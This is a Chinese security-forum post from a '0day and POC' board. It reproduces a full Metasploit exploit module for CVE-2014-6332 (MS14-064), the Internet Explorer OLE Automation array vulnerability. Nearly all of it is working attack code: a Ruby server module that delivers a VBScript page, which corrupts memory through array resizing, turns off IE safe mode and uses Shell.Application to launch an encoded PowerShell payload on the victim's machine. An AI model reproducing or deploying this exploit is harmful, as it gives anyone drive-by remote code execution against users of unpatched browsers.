搜索
中国白客联盟»论坛 Techniques 0day及EXP(0day and POC) Internet Explorer < 11 - OLE Automation Array Remo ...
返回列表 发新帖
查看: 473|回复: 0

Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF)

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-11-19 20:59:06 | 显示全部楼层 |阅读模式
  1. ##
  2. # This module requires Metasploit: http://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##

  6. require 'msf/core'
  7. require 'msf/core/exploit/powershell'

  9. class Metasploit3 < Msf::Exploit::Remote
  10.   Rank = ExcellentRanking

  12.   include Msf::Exploit::Remote::HttpServer::HTML
  13.   include Msf::Exploit::Powershell

  15.   def initialize(info={})
  16.     super(update_info(info,
  17.       'Name'           => "Windows OLE Automation Array Remote Code Execution",
  18.       'Description'    => %q{
  19.           This modules exploits the Windows OLE Automation Array Remote Code Execution Vulnerability.
  20.           Internet MS-14-064, CVE-2014-6332. The vulnerability exists in Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.  
  21.       },
  22.       'License'        => MSF_LICENSE,
  23.       'Author'         =>
  24.         [
  25.           'IBM', # Discovery
  26.       'yuange <twitter.com/yuange75>', # PoC
  27.       'Rik van Duijn <twitter.com/rikvduijn>', #Metasploit
  28.           'Wesley Neelen <security[at]forsec.nl>'  #Metasploit
  29.         ],
  30.       'References'     =>
  31.         [
  32.           [ 'CVE', '2014-6332' ]
  33.         ],
  34.       'Payload'        =>
  35.         {
  36.           'BadChars'        => "\x00",
  37.         },
  38.       'DefaultOptions'  =>
  39.         {
  40.           'EXITFUNC'         => "none"
  41.         },
  42.       'Platform'       => 'win',
  43.       'Targets'        =>  
  44.         [
  45.           [ 'Automatic', {} ]
  46.         ],
  47.       'Privileged'     => false,
  48.       'DisclosureDate' => "November 12 2014",
  49.       'DefaultTarget'  => 0))
  50.   end

  52.   def on_request_uri(cli, request)
  53.     payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
  54.     payl.slice! "powershell.exe "
  55.      
  56.     html = <<-EOS
  57. <!doctype html>

  59. <html>

  61. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >

  63. <head>

  65. </head>

  67. <body>


  70. <SCRIPT LANGUAGE="VBScript">


  73. function trigger()

  75. On Error Resume Next

  77. set shell=createobject("Shell.Application")

  79. shell.ShellExecute "powershell.exe", "#{payl}", "", "open", 1

  81. end function


  84. </script>


  87. <SCRIPT LANGUAGE="VBScript">

  89.   

  91. dim   aa()

  93. dim   ab()

  95. dim   a0

  97. dim   a1

  99. dim   a2

  101. dim   a3

  103. dim   win9x

  105. dim   intVersion

  107. dim   rnda

  109. dim   funclass

  111. dim   myarray


  114. Begin()


  117. function Begin()

  119.   On Error Resume Next

  121.   info=Navigator.UserAgent


  124.   if(instr(info,"Win64")>0)   then

  126.      exit   function

  128.   end if


  131.   if (instr(info,"MSIE")>0)   then

  133.              intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   

  135.   else

  137.      exit   function  

  139.               

  141.   end if


  144.   win9x=0


  147.   BeginInit()

  149.   If Create()=True Then

  151.      myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)

  153.      myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)


  156.      if(intVersion<4) then

  158.          document.write("<br> IE")

  160.          document.write(intVersion)

  162.          runshellcode()                    

  164.      else

  166.           setnotsafemode()

  168.      end if

  170.   end if

  172. end function


  175. function BeginInit()

  177.    Randomize()

  179.    redim aa(5)

  181.    redim ab(5)

  183.    a0=13+17*rnd(6)

  185.    a3=7+3*rnd(5)

  187. end function


  190. function Create()

  192.   On Error Resume Next

  194.   dim i

  196.   Create=False

  198.   For i = 0 To 400

  200.     If Over()=True Then

  202.     '   document.write(i)     

  204.        Create=True

  206.        Exit For

  208.     End If

  210.   Next

  212. end function


  215. sub testaa()

  217. end sub


  220. function mydata()

  222.     On Error Resume Next

  224.      i=testaa

  226.      i=null

  228.      redim  Preserve aa(a2)  

  230.    

  232.      ab(0)=0

  234.      aa(a1)=i

  236.      ab(0)=6.36598737437801E-314


  239.      aa(a1+2)=myarray

  241.      ab(2)=1.74088534731324E-310

  243.      mydata=aa(a1)

  245.      redim  Preserve aa(a0)  

  247. end function



  251. function setnotsafemode()

  253.     On Error Resume Next

  255.     i=mydata()  

  257.     i=readmemo(i+8)

  259.     i=readmemo(i+16)

  261.     j=readmemo(i+&h134)  

  263.     for k=0 to &h60 step 4

  265.         j=readmemo(i+&h120+k)

  267.         if(j=14) then

  269.               j=0         

  271.               redim  Preserve aa(a2)            

  273.      aa(a1+2)(i+&h11c+k)=ab(4)

  275.               redim  Preserve aa(a0)  


  278.      j=0

  280.               j=readmemo(i+&h120+k)   

  282.          

  284.                Exit for

  286.            end if


  289.     next

  291.     ab(2)=1.69759663316747E-313

  293.     trigger()

  295. end function


  298. function Over()

  300.     On Error Resume Next

  302.     dim type1,type2,type3

  304.     Over=False

  306.     a0=a0+a3

  308.     a1=a0+2

  310.     a2=a0+&h8000000

  312.    

  314.     redim  Preserve aa(a0)

  316.     redim   ab(a0)     

  318.    

  320.     redim  Preserve aa(a2)

  322.    

  324.     type1=1

  326.     ab(0)=1.123456789012345678901234567890

  328.     aa(a0)=10

  330.            

  332.     If(IsObject(aa(a1-1)) = False) Then

  334.        if(intVersion<4) then

  336.            mem=cint(a0+1)*16            

  338.            j=vartype(aa(a1-1))

  340.            if((j=mem+4) or (j*8=mem+8)) then

  342.               if(vartype(aa(a1-1))<>0)  Then   

  344.                  If(IsObject(aa(a1)) = False ) Then            

  346.                    type1=VarType(aa(a1))

  348.                  end if              

  350.               end if

  352.            else

  354.              redim  Preserve aa(a0)

  356.              exit  function


  359.            end if

  361.         else

  363.            if(vartype(aa(a1-1))<>0)  Then   

  365.               If(IsObject(aa(a1)) = False ) Then

  367.                   type1=VarType(aa(a1))

  369.               end if              

  371.             end if

  373.         end if

  375.     end if

  377.                

  379.      

  381.     If(type1=&h2f66) Then         

  383.           Over=True      

  385.     End If  

  387.     If(type1=&hB9AD) Then

  389.           Over=True

  391.           win9x=1

  393.     End If  


  396.     redim  Preserve aa(a0)         

  398.          

  400. end function


  403. function ReadMemo(add)

  405.     On Error Resume Next

  407.     redim  Preserve aa(a2)  

  409.    

  411.     ab(0)=0  

  413.     aa(a1)=add+4   

  415.     ab(0)=1.69759663316747E-313      

  417.     ReadMemo=lenb(aa(a1))  

  419.    

  421.     ab(0)=0   

  423.   

  425.     redim  Preserve aa(a0)

  427. end function


  430. </script>


  433. </body>

  435. </html>
  436.     EOS

  438.     print_status("Sending html")
  439.     send_response(cli, html, {'Content-Type'=>'text/html'})

  441.   end

  443. end
复制代码
过段时间可能会取消签到功能了
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表